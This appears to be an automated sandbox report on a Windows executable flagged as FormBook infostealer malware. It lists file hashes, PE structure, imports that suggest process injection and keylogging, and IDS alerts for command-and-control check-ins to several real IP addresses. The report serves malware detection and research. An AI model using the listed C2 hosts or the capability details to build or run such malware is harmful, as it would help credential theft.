Reputation:	low
Preview:	.n.Y5XOX\37X..TX.GAQORVDu7B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOX.37XJU.VS.H.n.W....\>*.(=7?AV5d)56=(5q-7v6@Yb]9yr..x5\S=jGYRwGAQORVDL6K.j9Q.r8?..8#.N...{1(.L..~T0.,..dSP..#70n'&.ORVD57B4..6X.YY3.j..TXSGAQOR.D76I5\Y6.KXX37XDJTX.SAQOBVD5GF4WYvXOHX37ZDJRXSGAQORPD57B4WY6(KXX17XDJTXQG..ORFD5'B4WY&XOHX37XDJDXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTX}3$);RVD.gF4WI6XO.\37HDJTXSGAQORVD57b4W96XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37X

C:\Users\user\AppData\Local\Temp\bothsidedness

Download File

Process:	C:\Users\user\Desktop\A2028041200SD.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.99390801361883
Encrypted:	true
SSDEEP:	6144:DkjD/HQHu14AdtU4ez+n9GWy2kMQqr63B:gjD/HSeckGPMQy6R
MD5:	D1E82D85CDB70D534D164E3D19AE3534
SHA1:	F38C24EC7AA9C2DAA4291D71D447C0F082ED433F
SHA-256:	647413465CC5305D5367B016E2821F100C6C250D06A99EB3D149CA6274A5A7DE
SHA-512:	F9368C2AEE4F9F85CA2FB3F41E5D2FF3F5FA2E7070121B353B0CC652652395606A273DFF6FF8E47290A815D89AEE599435CCAC254E8398A25A1749348FF16091
Malicious:	false
Preview:	.n.Y5XOX\37X..TX.GAQORVDu7B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOX.37XJU.VS.H.n.W....\>*.(=7?AV5d)56=(5q-7v6@Yb]9yr..x5\S=jGYRwGAQORVDL6K.j9Q.r8?..8#.N...{1(.L..~T0.,..dSP..#70n'&.ORVD57B4..6X.YY3.j..TXSGAQOR.D76I5\Y6.KXX37XDJTX.SAQOBVD5GF4WYvXOHX37ZDJRXSGAQORPD57B4WY6(KXX17XDJTXQG..ORFD5'B4WY&XOHX37XDJDXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTX}3$);RVD.gF4WI6XO.\37HDJTXSGAQORVD57b4W96XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37XDJTXSGAQORVD57B4WY6XOXX37X

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.156641325596591
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	A2028041200SD.exe
File size:	1'223'680 bytes
MD5:	2902d8f9bc667f82a0bb441f3c4dae1f
SHA1:	d4d9ed800e1917569e06b08665e5e19707f3412f
SHA256:	693424f033f85a79af47963f829e65b5315faad47cd4a82d3a0a76c6962c9968
SHA512:	9535bab52fa3239dccdb1f5d641b8761cf29355b2b9965d08af0985781477d7e08b60b223e487c6903e512611296f15c960f8ff0a25074e7ba0994dbd291490b
SSDEEP:	24576:Btb20pkaCqT5TBWgNQ7aTSC1YlZ2tO4VWjcf6A:SVg5tQ7aTilZyTH5
TLSH:	3045D02263DD8365C3B25273BA65B701BE7F782506B1F56B2FD8093DF920122521EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67491D74 [Fri Nov 29 01:48:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F59A48388EFh
jmp 00007F59A482B904h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F59A482BA8Ah
cmp edi, eax
jc 00007F59A482BDEEh
bt dword ptr [004C0158h], 01h
jnc 00007F59A482BA89h
rep movsb
jmp 00007F59A482BD9Ch
cmp ecx, 00000080h
jc 00007F59A482BC54h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F59A482BA90h
bt dword ptr [004BA370h], 01h
jc 00007F59A482BF60h
bt dword ptr [004C0158h], 00000000h
jnc 00007F59A482BC2Dh
test edi, 00000003h
jne 00007F59A482BC3Eh
test esi, 00000003h
jne 00007F59A482BC1Dh
bt edi, 02h
jnc 00007F59A482BA8Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F59A482BA93h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F59A482BAE5h
bt esi, 03h
jnc 00007F59A482BB38h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x61ab0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x61ab0	0x61c00	9402a3da19eccd2b20d69fe71f32325e	False	0.9326221827046036	data	7.904973440142294	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x58db5	data			1.0003324568561671
RT_GROUP_ICON	0x125570	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1255e8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1255fc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x125610	0x14	data	English	Great Britain	1.25
RT_VERSION	0x125624	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x125700	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-29T03:52:26.370008+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50017	194.245.148.189	80	TCP
2024-11-29T03:52:57.314704+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49717	104.21.40.167	80	TCP
2024-11-29T03:52:57.314704+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49717	104.21.40.167	80	TCP
2024-11-29T03:53:15.394447+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49762	23.167.152.41	80	TCP
2024-11-29T03:53:18.095701+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49768	23.167.152.41	80	TCP
2024-11-29T03:53:20.668093+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49775	23.167.152.41	80	TCP
2024-11-29T03:53:23.339349+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49785	23.167.152.41	80	TCP
2024-11-29T03:53:23.339349+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49785	23.167.152.41	80	TCP
2024-11-29T03:53:30.444313+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49802	66.29.132.194	80	TCP
2024-11-29T03:53:33.050179+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49808	66.29.132.194	80	TCP
2024-11-29T03:53:35.828804+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49814	66.29.132.194	80	TCP
2024-11-29T03:53:38.402924+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49819	66.29.132.194	80	TCP
2024-11-29T03:53:38.402924+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49819	66.29.132.194	80	TCP
2024-11-29T03:53:46.604407+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49838	202.92.5.23	80	TCP
2024-11-29T03:53:49.292024+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49844	202.92.5.23	80	TCP
2024-11-29T03:53:51.947985+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49850	202.92.5.23	80	TCP
2024-11-29T03:53:54.655873+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49857	202.92.5.23	80	TCP
2024-11-29T03:53:54.655873+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49857	202.92.5.23	80	TCP
2024-11-29T03:54:01.576700+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49877	194.195.220.41	80	TCP
2024-11-29T03:54:04.290581+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49884	194.195.220.41	80	TCP
2024-11-29T03:54:07.132233+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49890	194.195.220.41	80	TCP
2024-11-29T03:54:09.787502+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49896	194.195.220.41	80	TCP
2024-11-29T03:54:09.787502+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49896	194.195.220.41	80	TCP
2024-11-29T03:54:17.744197+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49916	103.230.159.86	80	TCP
2024-11-29T03:54:20.416077+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49922	103.230.159.86	80	TCP
2024-11-29T03:54:23.087700+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49928	103.230.159.86	80	TCP
2024-11-29T03:54:25.829319+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49935	103.230.159.86	80	TCP
2024-11-29T03:54:25.829319+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49935	103.230.159.86	80	TCP
2024-11-29T03:54:32.687356+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49953	104.21.31.242	80	TCP
2024-11-29T03:54:35.498355+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49961	104.21.31.242	80	TCP
2024-11-29T03:54:38.048936+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49967	104.21.31.242	80	TCP
2024-11-29T03:54:40.739833+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49973	104.21.31.242	80	TCP
2024-11-29T03:54:40.739833+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49973	104.21.31.242	80	TCP
2024-11-29T03:54:47.930840+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49988	118.107.250.103	80	TCP
2024-11-29T03:54:50.571221+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49994	118.107.250.103	80	TCP
2024-11-29T03:54:53.243274+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50002	118.107.250.103	80	TCP
2024-11-29T03:54:55.941988+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50006	118.107.250.103	80	TCP
2024-11-29T03:54:55.941988+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50006	118.107.250.103	80	TCP
2024-11-29T03:55:02.908327+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	209.74.77.109	80	TCP
2024-11-29T03:55:05.605786+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50008	209.74.77.109	80	TCP
2024-11-29T03:55:08.216619+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50009	209.74.77.109	80	TCP
2024-11-29T03:55:10.922948+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50010	209.74.77.109	80	TCP
2024-11-29T03:55:10.922948+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50010	209.74.77.109	80	TCP
